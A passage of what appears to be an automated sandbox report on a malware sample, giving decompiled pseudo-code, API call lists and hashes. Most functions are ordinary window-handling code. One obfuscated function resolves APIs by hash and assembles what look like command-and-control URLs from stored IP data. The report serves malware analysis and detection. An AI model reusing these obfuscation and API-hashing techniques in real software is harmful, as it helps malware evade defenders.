				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t48;
			}

APIs

__EH_prolog.LIBCMT ref: 00412126
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
LoadResource.KERNEL32(?,00000000), ref: 00412166

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

LockResource.KERNEL32(?), ref: 00412173
IsWindowEnabled.USER32(?), ref: 004121A6
EnableWindow.USER32(?,00000000), ref: 004121B4
EnableWindow.USER32(?,00000001), ref: 00412242
GetActiveWindow.USER32 ref: 0041224D
SetActiveWindow.USER32(?), ref: 0041225B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF9A, Relevance: 13.6, APIs: 9, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041DF9A(signed int __ecx) {
				void* _t33;
				void* _t34;
				CHAR* _t41;
				signed int _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t51;
				void* _t53;
				signed int _t62;
				signed int _t73;
				signed int _t75;
				void* _t77;

				E00406520(E0042A610, _t77);
				_push(__ecx);
				_t51 =  *(_t77 + 0xc);
				_t62 = __ecx;
				_t33 = 0x80c83b00;
				 *(_t77 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
				if((_t51 & 0x00000004) != 0) {
					_t33 = 0x80c83300;
				}
				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
				if(_t34 != 0) {
					asm("sbb esi, esi");
					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
					_t53 = E00417635();
					DeleteMenu( *(_t53 + 4), 0xf000, 0);
					DeleteMenu( *(_t53 + 4), 0xf020, 0);
					DeleteMenu( *(_t53 + 4), 0xf030, 0);
					DeleteMenu( *(_t53 + 4), 0xf120, 0);
					_t41 =  *0x436980; // 0x436994
					 *(_t77 + 0xc) = _t41;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
					__eflags = _t42;
					if(_t42 != 0) {
						DeleteMenu( *(_t53 + 4), 0xf060, 0);
						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
					}
					_t75 =  *(_t77 - 0x10);
					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
					__eflags = _t43;
					if(_t43 != 0) {
						__eflags = _t75;
						if(_t75 != 0) {
							_t44 =  *(_t75 + 0x1c);
						} else {
							_t44 = 0;
						}
						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
						_push(1);
						_pop(0);
					}
					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
					_t27 = _t77 - 4;
					 *_t27 =  *(_t77 - 4) | 0xffffffff;
					__eflags =  *_t27;
					E00416AEC(_t77 + 0xc);
					_t34 = 0;
				} else {
					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t34;
			}

APIs

__EH_prolog.LIBCMT ref: 0041DF9F
GetSystemMenu.USER32(?,00000000), ref: 0041E013
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
AppendMenuA.USER32 ref: 0041E08D
SetParent.USER32(?,?), ref: 0041E0CA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004104E7, Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004104E7(void* __ebx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ecx;
				void* __esi;
				struct HWND__* _t28;
				int _t31;
				int _t32;
				int _t34;
				void* _t35;
				void* _t40;
				void* _t41;
				signed int _t43;
				signed int _t52;

				_t40 = __ebx;
				_t52 = _t43;
				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t52 + 0x60) = E004120A5(_t52);
				E00413C3E();
				_t28 =  *(_t52 + 0x60);
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t52 + 0x60), 0);
				}
				_push(_t40);
				_t41 = E004249C4();
				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
					_push(_t52);
					"VWh\rDB"();
				} else {
					 *(_t41 + 0x18) = _t52;
				}
				_push(_t52 + 0x5c);
				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
					_t31 = GetSaveFileNameA();
				} else {
					_t31 = GetOpenFileNameA();
				}
				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
				_v8 = _t31;
				if(0 != 0) {
					EnableWindow( *(_t52 + 0x60), 1);
				}
				_t32 = IsWindow(_v12);
				_t64 = _t32;
				if(_t32 != 0) {
					SetFocus(_v12);
				}
				E004120DF(_t52, _t52, _t64);
				_t34 = _v8;
				if(_t34 == 0) {
					_t35 = 2;
					return _t35;
				}
				return _t34;
			}

APIs

lstrlenA.KERNEL32(?), ref: 004104F1
GetFocus.USER32 ref: 0041050C

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

IsWindowEnabled.USER32(?), ref: 00410535
EnableWindow.USER32(?,00000000), ref: 00410547
GetOpenFileNameA.COMDLG32(?), ref: 00410572
GetSaveFileNameA.COMDLG32(?), ref: 00410579
EnableWindow.USER32(?,00000001), ref: 00410590
IsWindow.USER32(00000000), ref: 00410596
SetFocus.USER32(00000000), ref: 004105A4

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99

Uniqueness

Uniqueness Score: -1.00%

Function 022C12B0, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E022C12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr _t199;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x22cdea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E022C3E80(_t191, E022C3F20(0xbb398380), 0x97f883e, _t278);
									 *0x22cdea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x22ce1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E022C3E80(_t191, E022C3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x22ce1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E022C1FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E022C4ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E022C4250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E022C4250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x22cdd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E022C3E80(_t191, E022C3F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x22cdd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E022C1950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E022C34C0(0x22cd0e0);
												_t182 =  *0x22cdc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E022C3E80(_t191, E022C3F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x22cdc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E022C3460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E022C4250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E022C42F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E022C57E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E022C4250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E022C1E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E022C34C0(0x22cd080);
									_t274 =  *0x22cdc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E022C3E80(_t191, E022C3F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x22cdc60 = _t274;
									}
									_t199 =  *0x22ce2e0; // 0x772760
									_t243 =  *(_t199 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E022C3460(_t266);
									_t127 =  *0x22ce2e0; // 0x772760
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 =  *( *((intOrPtr*)(_t127 + 0xc)) + 4) & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E022C42F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E022C5BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x22cdea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E022C3E80(_t191, E022C3F20(0xbb398380), 0x97f883e, _t278);
									 *0x22cdea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x22ce1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E022C3E80(_t191, E022C3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x22ce1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E022C4250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E022C2290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E022C1C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E022C2C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x022c12b0
0x022c12b8
0x022c12c0
0x022c12c2
0x022c12c6
0x022c12c8
0x022c12cc
0x022c12d0
0x022c12d5
0x022c12d9
0x022c12dd
0x022c12e1
0x022c12e1
0x022c12e1
0x022c12e8
0x022c12f0
0x022c12f0
0x022c12f0
0x022c12f0
0x022c12f5
0x00000000
0x00000000
0x022c12fb
0x022c1589
0x022c158e
0x022c1590
0x022c15a3
0x022c15a8
0x022c15a8
0x022c15af
0x022c15b1
0x022c15b6
0x022c15b8
0x022c15cb
0x022c15d0
0x022c15d0
0x022c15dc
0x022c15de
0x022c15e2
0x022c15e7
0x00000000
0x022c1301
0x022c1301
0x022c1306
0x022c148e
0x022c1493
0x022c1556
0x022c155b
0x00000000
0x022c1561
0x022c1569
0x022c156e
0x022c1574
0x022c1578
0x022c157f
0x00000000
0x022c157f
0x022c1499
0x022c1499
0x022c14e6
0x022c14fe
0x022c14fe
0x022c14ff
0x022c1510
0x022c151d
0x022c1523
0x022c1528
0x022c152b
0x022c152e
0x022c1531
0x022c1534
0x022c1534
0x022c1534
0x022c1537
0x022c153b
0x022c153b
0x022c153f
0x022c1545
0x022c1548
0x022c154d
0x00000000
0x022c149b
0x022c149b
0x022c14a0
0x022c14cb
0x022c14d0
0x022c14d4
0x022c14d9
0x00000000
0x022c14a2
0x022c14a2
0x022c14a7
0x022c1879
0x022c187b
0x022c1880
0x022c188e
0x00000000
0x00000000
0x00000000
0x022c14a7
0x022c14a0
0x022c1499
0x022c130c
0x022c130c
0x022c1452
0x022c1457
0x022c1459
0x022c146c
0x022c1471
0x022c1471
0x022c1476
0x022c1478
0x022c147c
0x022c1480
0x022c1484
0x00000000
0x022c1312
0x022c1312
0x022c1317
0x022c1414
0x022c1419
0x00000000
0x022c141f
0x022c142f
0x022c1434
0x022c1438
0x022c143b
0x022c1441
0x022c1448
0x00000000
0x022c1448
0x022c131d
0x022c131d
0x022c13b5
0x022c13b7
0x022c13bc
0x022c13be
0x022c13d1
0x022c13d6
0x022c13d6
0x022c13f6
0x022c13f8
0x022c13fd
0x022c1402
0x022c1406
0x022c140b
0x00000000
0x022c1323
0x022c1328
0x022c1394
0x022c1399
0x022c139d
0x022c13a2
0x00000000
0x022c132a
0x022c132f
0x00000000
0x022c1335
0x022c133b
0x022c1343
0x022c1345
0x022c1349
0x022c1353
0x022c135c
0x022c135d
0x022c1364
0x022c1369
0x022c136d
0x022c1371
0x022c1375
0x022c1375
0x022c137a
0x022c137a
0x022c137e
0x022c1382
0x022c1387
0x00000000
0x022c1387
0x022c132f
0x022c1328
0x022c131d
0x022c1317
0x022c130c
0x022c1306
0x00000000
0x022c12fb
0x022c15f0
0x022c15f5
0x022c174c
0x022c1751
0x022c1845
0x022c184d
0x022c1855
0x022c1859
0x022c185e
0x022c1864
0x022c1868
0x022c186f
0x00000000
0x022c1757
0x022c1757
0x022c175c
0x022c17c0
0x022c17c5
0x022c17cb
0x022c17cd
0x022c17cf
0x022c17e7
0x022c17e9
0x022c17e9
0x022c17ef
0x022c17f5
0x022c1813
0x022c1815
0x022c181a
0x022c181f
0x022c1824
0x022c1828
0x022c182c
0x022c1837
0x022c183b
0x00000000
0x022c175e
0x022c175e
0x022c1763
0x00000000
0x022c1769
0x022c1779
0x022c1782
0x022c1784
0x022c1788
0x022c178a
0x00000000
0x022c1790
0x022c1795
0x022c1796
0x022c179c
0x022c179e
0x022c17a1
0x022c17a5
0x022c17a7
0x00000000
0x022c17ad
0x022c17ad
0x022c17b1
0x00000000
0x022c17b1
0x022c17a7
0x022c178a
0x022c1763
0x022c175c
0x022c15fb
0x022c15fb
0x022c16e5
0x022c16ea
0x022c16ec
0x022c16ff
0x022c1704
0x022c1704
0x022c170b
0x022c170d
0x022c1712
0x022c1714
0x022c1727
0x022c172c
0x022c172c
0x022c1738
0x022c173a
0x022c173e
0x022c1743
0x00000000
0x022c1601
0x022c1601
0x022c1606
0x022c16bf
0x022c16c4
0x00000000
0x022c16ca
0x022c16ce
0x022c16d3
0x022c16d7
0x022c16dc
0x00000000
0x022c16dc
0x022c160c
0x022c160c
0x022c169f
0x022c16a4
0x022c16aa
0x022c16ae
0x022c16b5
0x00000000
0x022c1612
0x022c1612
0x022c1617
0x022c1680
0x022c1685
0x022c1689
0x022c168e
0x00000000
0x022c1619
0x022c1619
0x022c161e
0x00000000
0x022c1624
0x022c162c
0x022c1631
0x022c1639
0x022c1641
0x022c1649
0x022c1651
0x022c1656
0x022c165b
0x022c165f
0x022c1662
0x022c1668
0x022c166f
0x00000000
0x022c166f
0x022c161e
0x022c1617
0x022c160c
0x022c1606
0x022c15fb
0x00000000
0x022c14ad
0x022c14ad
0x022c14ad
0x022c14c6
0x00000000
0x022c14c6

Strings

a7a&, xrefs: 022C1548
Ei, xrefs: 022C17D1
`'w, xrefs: 022C17EF, 022C181F
a7a&, xrefs: 022C1612
Ei, xrefs: 022C13C0
E?*, xrefs: 022C1601

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$`'w$a7a&$a7a&$Ei$Ei
API String ID: 0-3380558184
Opcode ID: e00ae3a6574e22b1fc2d0d2c39f5ae354545562e71e0f55ce62f4da337567826
Instruction ID: 03d134985e2c3385313f4c27b6272484999e7f0961b3483778e96f759174fc20
Opcode Fuzzy Hash: e00ae3a6574e22b1fc2d0d2c39f5ae354545562e71e0f55ce62f4da337567826
Instruction Fuzzy Hash: E4E1C0716283428BC718DFA4D491A6BB3E2AFC4344F244E1DE44ACB349DB74E915CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3C1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				char _v296;
				void* __ebp;
				int _t61;
				signed char _t64;
				signed char _t69;
				void* _t79;
				struct HWND__* _t81;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t130;
				signed int _t131;
				intOrPtr _t134;
				void* _t136;

				_t130 = __edx;
				_t134 = _a4;
				_t109 = __ecx;
				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
					L3:
					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
					}
					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
					 *(_t109 + 0x64) = _t64;
					if((_t64 & 0x00000040) == 0) {
						E004165E5(_t134,  &_v296, 0x104);
						E0041A843( *(_t109 + 0x1c),  &_v296);
					}
					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
						_t70 = _t69 & 0x000000fe;
						__eflags = _t69 & 0x000000fe;
					} else {
						_t70 = _t69 | 0x00000001;
					}
					E004263C3(_t134, _t70);
					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
					if(_t131 > 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
					}
					if(_a8 == 0) {
						__eflags = _t131 - 1;
						if(_t131 < 1) {
							_t132 = _t109 + 0x7c;
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
						}
						_t115 =  *0x439bf4; // 0x2
						__eflags = 0;
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x439bf0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t109,  &_v20);
						if(_t131 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
							asm("movsd");
							asm("movsd");
							_push(_a4);
							asm("movsd");
							asm("movsd");
							E0041DD44(_t109);
							_t134 = _a4;
						}
						_push(0x114);
						_push(_v20.bottom - _v20.top);
						_push(_v20.right - _v20.left);
						_push(_v20.top);
						_push(_v20.left);
						_push(0);
					}
					E0041663D(_t134);
					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
						if(_t109 != 0) {
							_t81 =  *(_t109 + 0x1c);
						} else {
							_t81 = 0;
						}
						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
					}
					_t120 =  *((intOrPtr*)(_t134 + 0x70));
					_t153 =  *((intOrPtr*)(_t134 + 0x70));
